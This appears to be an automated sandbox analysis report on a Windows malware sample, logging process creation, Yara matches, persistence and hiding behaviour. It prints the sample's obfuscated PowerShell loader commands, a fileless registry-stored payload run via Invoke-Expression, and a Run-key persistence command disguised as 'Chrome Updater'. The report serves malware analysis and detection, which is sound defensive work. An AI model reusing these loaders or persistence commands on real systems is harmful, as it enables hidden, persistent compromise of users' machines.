                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function IrUjV([byte[]]$f9mpX) {Invoke-Expression -Verbose -Debug -InformationAction Ignore 'zZO$zZOSzZOfzZOYzZOszZO9zZO=zZO[zZOSzZOyzZOszZOtzZOezZOmzZO.zZOTzZOezZOxzZOtzZO.zZOEzZOnzZOczZOozZOdzZOizZOnzZOgzZO]zZO:zZO:zZOUzZOTzZOFzZO8zZO.zZOGzZOezZOtzZOSzZOtzZOrzZOizZOnzZOgzZO(zZO$zZOfzZO9zZOmzZOpzZOXzZO)zZO'.Replace('zZO', ''); return $SfYs9; } function SsYTA([byte[]]$MyDKV) {Invoke-Expression -WarningAction Inquire -Verbose 'RzW$RzWGRzWwRzW1RzWMRzWHRzW=RzW[RzWBRzWiRzWtRzWCRzWoRzWnRzWvRzWeRzWrRzWtRzWeRzWrRzW]RzW:RzW:RzWTRzWoRzWIRzWnRzWtRzW3RzW2RzW(RzW$RzWMRzWyRzWDRzWKRzWVRzW,RzW0RzW)RzW;RzW'.Replace('RzW', ''); return $Gw1MH; } $MXyPq = IrUjV(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61); $lsxMg = IrUjV(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d); $gYqop = IrUjV(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73); $QR3m4 = IrUjV(0x4a, 0x6d, 106, 53, 121); $Q21ag = IrUjV(0x67, 0x69, 69, 99, 67); $u2Okr = SsYTA(0x00, 0, 0, 0x00); $dXs3R = $true; $gnS0E = $null; function juypb($gsleS) {Invoke-Expression -Debug -WarningAction Inquire 'Fs5$Fs5wFs5GFs52Fs5gFs5lFs5=Fs5[Fs5SFs5yFs5sFs5tFs5eFs5mFs5.Fs5SFs5eFs5cFs5uFs5rFs5iFs5tFs5yFs5.Fs5CFs5rFs5yFs5pFs5tFs5oFs5gFs5rFs5aFs5pFs5hFs5yFs5.Fs5AFs5eFs5sFs5]Fs5:Fs5:Fs5CFs5rFs5eFs5aFs5tFs5eFs5(Fs5)Fs5'.Replace('Fs5', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose 'hta$htawhtaGhta2htaghtalhta.htaMhtaohtadhtaehta=hta[htaShtayhtashtathtaehtamhta.htaShtaehtachtauhtarhtaihtathtayhta.htaChtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htaChtaihtaphtahhtaehtarhtaMhtaohtadhtaehta]hta:hta:htaChtaBhtaChta'.Replace('hta', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire 'RLY$RLYwRLYGRLY2RLYgRLYlRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLY=RLY[RLYSRLYyRLYsRLYtRLYeRLYmRLY.RLYSRLYeRLYcRLYuRLYrRLYiRLYtRLYyRLY.RLYCRLYrRLYyRLYpRLYtRLYoRLYgRLYrRLYaRLYpRLYhRLYyRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLYMRLYoRLYdRLYeRLY]RLY:RLY:RLYPRLYKRLYCRLYSRLY7RLY'.Replace('RLY', ''); Invoke-Expression -WarningAction Inquire -Verbose 'MnG$MnGwMnGGMnG2MnGgMnGlMnG.MnGKMnGeMnGyMnG=MnG[MnGSMnGyMnGsMnGtMnGeMnGmMnG.MnGCMnGoMnGnMnGvMnGeMnGrMnGtMnG]MnG:MnG:MnGFMnGrMnGoMnGmMnGBMnGaMnGsMnGeMnG6MnG4MnGSMnGtMnGrMnGiMnGnMnGgMnG(MnG$MnGMMnGXMnGyMnGPMnGqMnG)MnG'.Replace('MnG', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire 'BNK$BNKwBNKGBNK2BNKgBNKlBNK.BNKIBNKVBNK=BNK[BNKSBNKyBNKsBNKtBNKeBNKmBNK.BNKCBNKoBNKnBNKvBNKeBNKrBNKtBNK]BNK:BNK:BNKFBNKrBNKoBNKmBNKBBNKaBNKsBNKeBNK6BNK4BNKSBNKtBNKrBNKiBNKnBNKgBNK(BNK$BNKl
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function Ib6pi([byte[]]$Sf4DZ) {Invoke-Expression -Verbose -WarningAction Inquire -Debug 'O2o$O2ocO2oqO2o1O2oaO2oGO2o=O2o[O2oSO2oyO2osO2otO2oeO2omO2o.O2oTO2oeO2oxO2otO2o.O2oEO2onO2ocO2ooO2odO2oiO2onO2ogO2o]O2o:O2o:O2oUO2oTO2oFO2o8O2o.O2oGO2oeO2otO2oSO2otO2orO2oiO2onO2ogO2o(O2o$O2oSO2ofO2o4O2oDO2oZO2o)O2o'.Replace('O2o', ''); return $cq1aG; } function Smsgn([byte[]]$TYS1W) {Invoke-Expression -Verbose -InformationAction Ignore 'StI$StIrStIwStIZStIwStIHStI=StI[StIBStIiStItStICStIoStInStIvStIeStIrStItStIeStIrStI]StI:StI:StITStIoStIIStInStItStI3StI2StI(StI$StITStIYStISStI1StIWStI,StI0StI)StI;StI'.Replace('StI', ''); return $rwZwH; } $yOU0b = Ib6pi(0x74<#chvvk#>,0x52<#u2CEY#>,0x6B<#MVTFN#>,0x58<#YiCr7#>,0x43<#K8mg9#>,0x36<#UhqQ4#>,0x6A<#cQm2O#>,0x2B<#flcxM#>,0x34<#OY2RT#>,0x5A<#ALzz6#>,0x6F<#zoKd3#>,0x52<#d4OvL#>,0x59<#SLwJ0#>,0x62<#zsa1m#>,0x79<#sFOep#>,0x47<#qGVN9#>,0x70<#Ks1U4#>,0x6F<#uGJ9p#>,0x4D<#kWql0#>,0x45<#EmsaU#>,0x75<#Ov8NF#>,0x6B<#uZpyF#>,0x6B<#XiBw9#>,0x43<#hUbO7#>,0x59<#ujaL4#>,0x46<#ZYnnj#>,0x42<#JY42r#>,0x51<#WtnPA#>,0x34<#YaV4N#>,0x2F<#HV4mN#>,0x46<#nKdcb#>,0x79<#lUwSl#>,0x64<#awCO3#>,0x34<#CnIFi#>,0x58<#uqMOd#>,0x4F<#YNg7w#>,0x4B<#HeBay#>,0x4E<#A4cb9#>,0x58<#F6Vnf#>,0x78<#kXGAK#>,0x2B<#ZMzDT#>,0x45<#E8P88#>,0x67<#Zyzgc#>,0x3D<#Auma2#>); $pKdS6 = Ib6pi(0x4E<#HLrGc#>,0x47<#xVisw#>,0x30<#EHfxR#>,0x52<#wp7Gt#>,0x63<#Cpdce#>,0x50<#OHyLe#>,0x37<#xvqHB#>,0x49<#PetlW#>,0x36<#lZgM3#>,0x7A<#TTBOg#>,0x75<#Rxgr0#>,0x45<#YsPlK#>,0x65<#qhXNz#>,0x65<#QaXw9#>,0x6F<#W6Vt9#>,0x32<#gIQiG#>,0x46<#yGjpJ#>,0x6F<#HP9Ri#>,0x77<#dPHbh#>,0x72<#KCTWk#>,0x34<#x6PPE#>,0x51<#VbwrN#>,0x3D<#RcqfM#>,0x3D<#l7sEq#>); $mxwaP = Ib6pi(0x53<#DbFNZ#>,0x6F<#Jy4Lx#>,0x66<#ez47J#>,0x74<#B1Uku#>,0x77<#kcRDO#>,0x61<#GimOz#>,0x72<#MUPpg#>,0x65<#a0Bz2#>,0x5C<#ehl3n#>,0x4D<#ZitVL#>,0x69<#smHT8#>,0x63<#fJC9S#>,0x72<#hMqWi#>,0x6F<#NkObo#>,0x73<#IzfrK#>,0x6F<#J1Yat#>,0x66<#dzRC7#>,0x74<#fM5r5#>,0x5C<#RyBgP#>,0x57<#T0PUW#>,0x69<#vTRqA#>,0x6E<#BHZJx#>,0x64<#mvlQt#>,0x6F<#p5nY6#>,0x77<#DohgT#>,0x73<#Sx8cw#>); $RGohu = Ib6pi(0x6B<#QlDDy#>,0x70<#NhkB5#>,0x44<#Zww3K#>,0x53<#eNvxb#>,0x46<#XM0XT#>); $RwltO = Smsgn(0x00<#h5SFV#>,0x00<#ucupc#>,0x00<#MID9v#>,0x00<#HXOXF#>); $ewoV8 = $true; $jOK5y = $null; function Yz1Gd($VHgBC) {Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore 'CKA$CKAeCKAyCKAyCKAQCKAHCKA=CKA[CKASCKAyCKAsCKAtCKAeCKAmCKA.CKASCKAeCKAcCKAuCKArCKAiCKAtCKAyCKA.CKACCKArCKAyCKApCKAtCKAoCKAgCKArCKAaCKApCKAhCKAyCKA.CKAACKAeCKAsCKA]CKA:CKA:CKACCKArCKAeCKAaCKAtCKAeCKA(CKA)CKA'.Replace('CKA', ''); Invoke-Expression -WarningAction Inquire -Verbose 'RHv$RHveRHvyRHvyRHvQRHvHRHv.RHvMRHvoRHvdRHveRHv=RHv[RHvSRHvyRHvsRHvtRHveRHvmRHv.RHvSRHveRHvcRHvuRHvrRHviRHvtRHvyRHv.RHvCRHvrRHvyRHvpRHvtRHvoRHvgRHvrRHvaRHvpRHvhRHvyRHv.RHvCRHviRHvpRHvhRHveRHvrRHvMRHvoRHvdRHveRHv]RHv:RHv:RHvCRHvBRHvCRHv'.Replace('RHv', ''); Invoke-Expression -Verbose -DJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function IrUjV([byte[]]$f9mpX) {Invoke-Expression -Verbose -Debug -InformationAction Ignore 'zZO$zZOSzZOfzZOYzZOszZO9zZO=zZO[zZOSzZOyzZOszZOtzZOezZOmzZO.zZOTzZOezZOxzZOtzZO.zZOEzZOnzZOczZOozZOdzZOizZOnzZOgzZO]zZO:zZO:zZOUzZOTzZOFzZO8zZO.zZOGzZOezZOtzZOSzZOtzZOrzZOizZOnzZOgzZO(zZO$zZOfzZO9zZOmzZOpzZOXzZO)zZO'.Replace('zZO', ''); return $SfYs9; } function SsYTA([byte[]]$MyDKV) {Invoke-Expression -WarningAction Inquire -Verbose 'RzW$RzWGRzWwRzW1RzWMRzWHRzW=RzW[RzWBRzWiRzWtRzWCRzWoRzWnRzWvRzWeRzWrRzWtRzWeRzWrRzW]RzW:RzW:RzWTRzWoRzWIRzWnRzWtRzW3RzW2RzW(RzW$RzWMRzWyRzWDRzWKRzWVRzW,RzW0RzW)RzW;RzW'.Replace('RzW', ''); return $Gw1MH; } $MXyPq = IrUjV(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61); $lsxMg = IrUjV(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d); $gYqop = IrUjV(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73); $QR3m4 = IrUjV(0x4a, 0x6d, 106, 53, 121); $Q21ag = IrUjV(0x67, 0x69, 69, 99, 67); $u2Okr = SsYTA(0x00, 0, 0, 0x00); $dXs3R = $true; $gnS0E = $null; function juypb($gsleS) {Invoke-Expression -Debug -WarningAction Inquire 'Fs5$Fs5wFs5GFs52Fs5gFs5lFs5=Fs5[Fs5SFs5yFs5sFs5tFs5eFs5mFs5.Fs5SFs5eFs5cFs5uFs5rFs5iFs5tFs5yFs5.Fs5CFs5rFs5yFs5pFs5tFs5oFs5gFs5rFs5aFs5pFs5hFs5yFs5.Fs5AFs5eFs5sFs5]Fs5:Fs5:Fs5CFs5rFs5eFs5aFs5tFs5eFs5(Fs5)Fs5'.Replace('Fs5', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose 'hta$htawhtaGhta2htaghtalhta.htaMhtaohtadhtaehta=hta[htaShtayhtashtathtaehtamhta.htaShtaehtachtauhtarhtaihtathtayhta.htaChtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htaChtaihtaphtahhtaehtarhtaMhtaohtadhtaehta]hta:hta:htaChtaBhtaChta'.Replace('hta', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire 'RLY$RLYwRLYGRLY2RLYgRLYlRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLY=RLY[RLYSRLYyRLYsRLYtRLYeRLYmRLY.RLYSRLYeRLYcRLYuRLYrRLYiRLYtRLYyRLY.RLYCRLYrRLYyRLYpRLYtRLYoRLYgRLYrRLYaRLYpRLYhRLYyRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLYMRLYoRLYdRLYeRLY]RLY:RLY:RLYPRLYKRLYCRLYSRLY7RLY'.Replace('RLY', ''); Invoke-Expression -WarningAction Inquire -Verbose 'MnG$MnGwMnGGMnG2MnGgMnGlMnG.MnGKMnGeMnGyMnG=MnG[MnGSMnGyMnGsMnGtMnGeMnGmMnG.MnGCMnGoMnGnMnGvMnGeMnGrMnGtMnG]MnG:MnG:MnGFMnGrMnGoMnGmMnGBMnGaMnGsMnGeMnG6MnG4MnGSMnGtMnGrMnGiMnGnMnGgMnG(MnG$MnGMMnGXMnGyMnGPMnGqMnG)MnG'.Replace('MnG', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire 'BNK$BNKwBNKGBNK2BNKgBNKlBNK.BNKIBNKVBNK=BNK[BNKSBNKyBNKsBNKtBNKeBNKmBNK.BNKCBNKoBNKnBNKvBNKeBNKrBNKtBNK]BNK:BNK:BNKFBNKrBNKoBNKmBNKBBNKaBNKsBNKeBNK6BNK4BNKSBNKtBNKrBNKiBNKnBNKgBNK(BNK$BNKlJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3mrJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')Jump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')Jump to behavior
                      Yara detected Costura Assembly Loader
                      Source: Yara matchFile source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYSTR
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF7C02243DE push ds; iretd 6_2_00007FF7C02243DF
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF7C022E8DA push ebx; retn 0009h6_2_00007FF7C022E90A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C0250160 push edx; retf 8_2_00007FF7C025475B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C02443DE push ds; iretd 8_2_00007FF7C02443DF
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C02510F0 push eax; ret 8_2_00007FF7C025115C

                      Boot Survival

                      barindex
                      Creates autostart registry keys with suspicious values (likely registry only malware)
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chrome Updater mshta vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close")Jump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chrome UpdaterJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chrome UpdaterJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows s1UnbJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
